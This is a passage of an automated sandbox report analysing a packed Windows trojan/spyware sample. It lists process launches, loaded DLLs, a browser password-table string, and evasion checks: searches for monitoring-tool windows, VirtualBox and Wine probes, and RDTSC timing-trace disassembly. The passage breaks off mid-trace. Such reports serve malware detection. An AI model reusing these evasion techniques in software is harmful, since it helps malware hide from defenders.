              Source: file.exe, 00000000.00000003.2406324936.0000000006311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2399535304.000000000637E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2426121455.000000000164B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2398589649.000000000629D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2406188266.00000000061E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2408309875.00000000061EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2405421604.000000000630F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2425775520.0000000005DE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2397989557.0000000006299000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2396686281.0000000006289000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: ZLIB complexity 0.9992443647540984
              Source: file.exeStatic PE information: Section: aguiceug ZLIB complexity 0.993694500719479
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/70@11/6
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000003.2117976950.0000000005D66000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117885792.0000000005D70000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2147828727.0000000005D71000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1984,i,11204049690359226366,8167700250922482004,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1984,i,13680411521332787545,10737033242991967105,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1984,i,11204049690359226366,8167700250922482004,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1984,i,13680411521332787545,10737033242991967105,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
              Source: Google Drive.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: YouTube.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Sheets.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Gmail.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Slides.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Docs.lnk.4.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: file.exeStatic file information: File size 1861632 > 1048576
              Source: file.exeStatic PE information: Raw size of aguiceug is bigger than: 0x100000 < 0x19ca00
              Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: file.exe, 00000000.00000003.2458062571.0000000008670000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2552756176.0000000006732000.00000040.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.ee0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aguiceug:EW;fauycpnw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aguiceug:EW;fauycpnw:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1cc112 should be: 0x1cbd1c
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: aguiceug
              Source: file.exeStatic PE information: section name: fauycpnw
              Source: file.exeStatic PE information: section name: .taggant
              Source: file.exeStatic PE information: section name: entropy: 7.978830867849266
              Source: file.exeStatic PE information: section name: aguiceug entropy: 7.952591393265852

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A442D second address: 10A4435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A4435 second address: 10A443A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B9CB0 second address: 10B9CD2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FBA4947DCE6h 0x00000008 jc 00007FBA4947DCE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jnc 00007FBA4947DCE6h 0x00000017 jl 00007FBA4947DCE6h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B9E19 second address: 10B9E1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD39A second address: 10BD3A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD3A0 second address: 10BD3E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B570h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 1344D71Fh 0x00000010 mov dl, 97h 0x00000012 push 00000003h 0x00000014 mov edi, 5AAA1CE6h 0x00000019 push 00000000h 0x0000001b push 00000003h 0x0000001d je 00007FBA4947B570h 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 xor dword ptr [ebp+122D352Dh], ecx 0x0000002c popad 0x0000002d call 00007FBA4947B569h 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD3E6 second address: 10BD3EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD3EA second address: 10BD414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ebx 0x00000009 push ecx 0x0000000a jno 00007FBA4947B566h 0x00000010 pop ecx 0x00000011 pop ebx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push edx 0x00000017 push ebx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ebx 0x0000001b pop edx 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jg 00007FBA4947B566h 0x00000027 push eax 0x00000028 pop eax 0x00000029 popad 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD414 second address: 10BD42E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBA4947DCE8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jc 00007FBA4947DCF8h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD42E second address: 10BD432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD4B8 second address: 10BD50A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D1835h], ecx 0x00000010 push 00000000h 0x00000012 call 00007FBA4947DCF7h 0x00000017 mov edx, dword ptr [ebp+122D3765h] 0x0000001d pop esi 0x0000001e call 00007FBA4947DCE9h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FBA4947DCF7h 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD50A second address: 10BD50F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD50F second address: 10BD545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 ja 00007FBA4947DCEEh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jmp 00007FBA4947DCEEh 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a jno 00007FBA4947DCE8h 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD545 second address: 10BD5B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jnp 00007FBA4947B572h 0x00000012 jne 00007FBA4947B56Ch 0x00000018 pop eax 0x00000019 jmp 00007FBA4947B572h 0x0000001e push 00000003h 0x00000020 mov dword ptr [ebp+122D1B78h], eax 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+122D2310h], edx 0x0000002e push 00000003h 0x00000030 mov si, bx 0x00000033 call 00007FBA4947B569h 0x00000038 push eax 0x00000039 push edx 0x0000003a push esi 0x0000003b jmp 00007FBA4947B579h 0x00000040 pop esi 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD5B1 second address: 10BD5B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD5B6 second address: 10BD613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007FBA4947B581h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 jmp 00007FBA4947B572h 0x0000001a push eax 0x0000001b jmp 00007FBA4947B56Dh 0x00000020 pop eax 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 push ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 jo 00007FBA4947B566h 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD613 second address: 10BD66F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jmp 00007FBA4947DCF6h 0x00000013 pop eax 0x00000014 sbb di, F938h 0x00000019 lea ebx, dword ptr [ebp+1245420Dh] 0x0000001f jmp 00007FBA4947DCF5h 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FBA4947DCECh 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD769 second address: 10BD7A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FBA4947B575h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov edi, dword ptr [ebp+122D370Dh] 0x00000012 sub di, A1D6h 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+122D1B78h], ecx 0x0000001f push 11F499C6h 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push ecx 0x00000029 pop ecx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD7A3 second address: 10BD7C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947DCF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BD7C0 second address: 10BD872 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA4947B56Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 11F49946h 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FBA4947B568h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a push 00000003h 0x0000002c add dx, 48ADh 0x00000031 push 00000000h 0x00000033 mov esi, 7CB5EA50h 0x00000038 push 00000003h 0x0000003a movsx esi, cx 0x0000003d push 43EEC947h 0x00000042 push edi 0x00000043 jmp 00007FBA4947B578h 0x00000048 pop edi 0x00000049 add dword ptr [esp], 7C1136B9h 0x00000050 lea ebx, dword ptr [ebp+12454218h] 0x00000056 mov ecx, 0BEA0C00h 0x0000005b pushad 0x0000005c mov dword ptr [ebp+122D3451h], ebx 0x00000062 mov dh, ch 0x00000064 popad 0x00000065 xchg eax, ebx 0x00000066 jmp 00007FBA4947B570h 0x0000006b push eax 0x0000006c pushad 0x0000006d jnc 